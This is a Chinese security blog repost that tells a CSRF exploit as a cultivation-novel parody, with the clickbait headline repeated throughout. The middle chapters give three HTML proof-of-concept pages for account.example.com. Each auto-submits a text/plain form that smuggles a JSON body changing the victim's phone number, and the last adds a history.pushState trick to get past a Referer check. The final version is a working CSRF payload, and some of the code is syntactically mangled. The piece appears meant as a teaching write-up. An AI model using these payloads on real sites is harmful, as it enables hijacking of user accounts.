高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

admin 2025年5月19日17:18:25评论5 views字数 2709阅读9分1秒阅读模式

甲方爸爸看了立刻召开安全会议!

白帽子边骂边点进来学POC构造!!
吃瓜群众误以为是修真小说误入技术战场!!!
平台算法因“4000万”“夺舍”等高流量词疯狂推送!!!!
你还在犹豫什么!速速点击关注公众号加入我们吧!!!!!

第三章:血赚4000灵石!这波域外天魔竟是我自己

林陌站在「幽冥漏洞」裂缝边缘,手中数据长剑被腾讯玄武实验室的防火墙震得寸寸崩裂。白袍少年指尖金芒暴涨,厉喝:“道友,你已入魔道!”

高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

“魔道?”林陌突然大笑,神识中系统提示疯狂闪烁:【检测到SS级支线任务——吞噬CSRF漏洞,奖励「因果律篡改秘术」!】

他猛地捏碎怀中玉简,身形化作万千数据流消散,只留下一句:“TT_SSV,且看这三千网络位面,究竟是谁的猎场!”

——

再睁眼时,林陌已身处「万界交易所」。眼前悬浮着血色任务卷轴:「劫掠account.example.com,篡改命格者赏4000灵石!」

“有趣,这次竟是跨站请求伪造?”他冷笑,数据之眼洞穿虚空。只见目标系统的「灵脉节点」全以.json为后缀,请求包如锁链般缠绕成阵,却唯独缺少「护体真气」(CSRF Token)。

“以JSON格式布阵,自恃同源策略护体?”林陌并指如刀,在虚空中刻下邪异符咒:“殊不知本尊的「因果律篡改秘术」,专破这等傲慢结界!”

第四章:当我在修真界玩转Content-Type

林陌双手结印,创建了⼀个简单的 POC,将 enctype 设置为 enctype="text/plain",并

在 hide 中包含 JSON 正文:

<html><head><metaname="referrer"content="unsafe-url"></head><body><script>history.pushState('''''/')</script><formname="hacker"method="POST"action="https://account.example.com/phone.json"enctype="text/plain"><inputtype="hidden"name'{"_formName":"change-phone","phone":"01111111118"}'></form><script>document.forms[0].submit();</script></body></html>

但是这却导致以下的 JSON 主体出现在林陌眼前:高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

他发现这并不是有效的 JSON 格式,因为在提交表单时,每个输⼊都应同时具有名称和值,格式为 name=value。于是他将 name属性设置预期的主体,添加⼀个随机参数以下⼀个=符号作为其值,然后将 value 属性设置为}。

<input type="hidden" name= '{"phone":"01111111118","a":"'value='"}'>

修改完后眼前就出现了正确的JSON主体:高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

得到了最终POC

<html><head><meta name="referrer" content="unsafe-url"></head><body><script>history.pushState('''''/')</script><form name="hacker" method="POST"action="https://account.example.com/phone.json"enctype="text/plain"> <input type="hidden" name= '{"phone":"01111111118","a":"' value='"}'> </form> <script> document.forms[0].submit(); </script></body></html>

但却在林陌尝试访问后,返回了400。高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

于是林陌开始测试请求头 Origin、Content-type、Referer,测试后发现是因为请求包的请求头 Referer 有问题。他决定用 JavaScript 中的 history.pushState 函数设置标头来解决问题,最终得到了以下poc:

<html><head><meta name="referrer" content="unsafe-url"></head><body><script>history.pushState('''''/')</script><form name="hacker" method="POST"action="https://account.example.com/phone.json" enctype="text/plain"> <input type="hidden" name= '{"phone":"01111111118","a":"' value='"}'> </form> <script> history.pushState("""""/[email protected]") document.forms[0].submit(); </script></body></html>

“将Content-Type伪装成纯文本,再以残缺JSON诱骗系统……”他指尖渗出血珠,每一滴都化作恶意脚本,“此术看似简单,却需精确到毫厘的灵力操控!”

高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

突然,虚空裂开猩红眼眸!交易所警报响彻云霄:【检测到域外天魔篡改「生死簿」关联系统!】

“晚了!”林陌狞笑着捏爆符咒。只见无数受害者账户的「命格线」从九天垂落,其中一条赫然写着——“TT玄武实验室外门弟子:张正阳”

第五章:黑产老祖的钓鱼执法

就在林陌即将切断张正阳的命格线时,整座交易所突然凝固。

“小友,这4000灵石烫手啊。”苍老声音从背后传来,林陌骇然发现手中灵石竟化作蠕动的黑色代码!抬眼望去,一尊身披暗网斗篷的老者虚影,正把玩着刻有骷髅图腾的密钥——正是幽冥裂缝中见过的魔道信物!

“黑产老祖?!”林陌暴退三步,系统突然尖叫:【警告!对方炼化了SSR级漏洞「永恒之蓝」!】高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

老者轻笑:“你以为CSRF漏洞是谁故意留的饵?篡改十万凡人命格不过蝇头小利……”他抬手撕开天幕,“加入我暗网剑宗,老夫教你何为真正的——偷天换日!”

(系统提示:吞噬进度15%,解锁「域混淆身法」)

下期预告

· 林陌反手将黑产老祖炼成肉鸡!

· TT玄武实验室祭出终极大杀器——WAF诛仙阵!

欲知后事如何?关注公众号,加入QQ群,且听下回分解!

高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!

原文始发于微信公众号(EnhancerSec):高危预警!CSRF禁术复活!百万用户秒变“提线木偶”,腾讯安全组连夜追杀域外天魔!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月19日17:18:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   高危预警!CSRF禁术复活!百万用户秒变提线木偶,腾讯安全组连夜追杀域外天魔!https://cn-sec.com/archives/4041002.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息